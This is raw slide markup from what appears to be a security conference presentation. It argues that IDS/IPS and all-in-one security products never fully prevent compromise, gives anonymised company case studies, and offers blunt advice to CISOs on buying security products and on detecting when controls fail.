            <a:ext cx="8489904" cy="4339650"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>GUI/User experience</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Management features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pretty reports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>RFP’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Analyst suggestions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What you’ve used before</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PRICE$$$</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5533388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371" y="155358"/>
            <a:ext cx="8489904" cy="553998"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Memory Lane</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="http://www.williesimpson.com/wp-content/uploads/2011/03/memory-la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201" y="1195263"/>
            <a:ext cx="7124700" cy="481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7682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IDS/IPS Never Worked</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="328371" y="1017588"/>
            <a:ext cx="8489904" cy="5041380"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IDS/IPS never worked perfectly. Ever.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IDS/IPS signatures *never* “prevented” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ownage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rarely detected activity, from an internal perspective</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IDS/IPS gave you visibility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rarely did it stop attacks or exploits, ESPECIALLY on an internal network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>This is the largest misconception about IDS/IPS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>EVER</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IDS/IPS still has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>value, but how much?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15589392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7187" y="5813313"/>
            <a:ext cx="7620563" cy="584776"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="da-DK" sz="3200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7CBF31"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Our</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7CBF31"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="3200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7CBF31"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Experience</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7CBF31"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1038895"/>
            <a:ext cx="7720717" cy="4345939"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22924365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Case Studies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="328371" y="1017587"/>
            <a:ext cx="8489904" cy="5054439"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Small Healthcare Clinic (Non-Profit); 10 clinics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Suffered intrusion, malicious intent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Managed Service Provider – FW</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>False sense of security – believed provider was monitoring for intrusions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Called provider, “My account is locked out” – their response?  “Me too!”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Firewall, device failure?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Small 500 Employee Company</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sold UTMs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Told “It was all they would need”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can’t stop getting infected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No workstation hardening, monitoring, content filtering, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17258572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Case Studies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="328371" y="1017588"/>
            <a:ext cx="8489904" cy="5013342"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Large 10,000 Employee Company</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IDS/IPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Advanced Threat; Content Filtering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>AV Failures; Many infections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Realizing value of IDS/IPS; visibility; AUP violations; etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fortune 1000 – 20,000 Employees</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Currently have Advanced Threat, DLP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Purchased IDS/IPS for 7 figures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Compliance Checkbox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34005683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Would We Do?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="328371" y="1017588"/>
            <a:ext cx="8489904" cy="4588949"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pay attention to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HD Moore’s Law</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Measure success over time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Measure failure constantly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Protecting your assets and IP are a core competency</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Only outsource when you are certain they can do it better</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Avoid your ‘mess for less’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39395880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Wouldn’t Do</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="328371" y="1017588"/>
            <a:ext cx="8489904" cy="4976747"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Knock it off with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Defense in depth (meaning more isn’t always better)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What my competition is doing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Industry standards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Compliance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The average CISO’s job is said to last 18 months</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>So try to be original</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Your ass is on the line</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3893906" y="1767423"/>
            <a:ext cx="5095982" cy="2291137"/>
            <a:chOff x="3626778" y="1119883"/>
            <a:chExt cx="5095982" cy="2291137"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Left Arrow 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3626778" y="1119883"/>
              <a:ext cx="5095982" cy="2291137"/>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921321" y="2080785"/>
              <a:ext cx="3647326" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>!!!!SHUT UP IT STILL WORKS!!!!</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="151017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Wouldn’t Do</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329184" y="1014984"/>
            <a:ext cx="8476029" cy="5087865"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>You all know there is no silver bullet, &amp; yet you still attempt to buy one?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>There is no such thing as a GOD box</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Performance is always crap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Effectiveness is always questionable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The more things a product does, the less effective it is at what it does</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The good vendors will admit to that</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The bad vendors / resellers will not</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If you hear the words “This is all you need” - RUN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="293461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781339" y="3562282"/>
            <a:ext cx="4362661" cy="2995415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What To Do When Security Fails?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329184" y="1014984"/>
            <a:ext cx="8476029" cy="2982355"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ontrols </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ail, accept it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They all have weaknesses &amp; flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You’ve piled the sandbag high, what backs that up?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The question is, how will you detect it?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Look for alternative ways for the failure of other technologies to be visible</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22210473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15641" y="4590659"/>
            <a:ext cx="3338891" cy="1446550"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>Thank You!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045581" y="4590659"/>
            <a:ext cx="4370062" cy="880840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Connector 4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5649243" y="4611307"/>
            <a:ext cx="2898659" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="71B532"/>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649243" y="5401396"/>
            <a:ext cx="2898659" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="71B53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22942" y="4611307"/>
            <a:ext cx="744351" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="71B53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22942" y="5401396"/>
            <a:ext cx="744351" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="71B532"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 2" descr="O:\Industry Contributions\SecureChicago\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960" y="1304818"/>
            <a:ext cx="4127750" cy="1931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9516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You Decide What To Buy?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="328371" y="1017588"/>
            <a:ext cx="8489904" cy="5139869"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Industry Reports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>Analysts/Gartner MQ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1" smtClean="0"/>
              <a:t>NSSLabs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>, ICSA, SC Magazine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Relationships</a:t>
            </a:r>
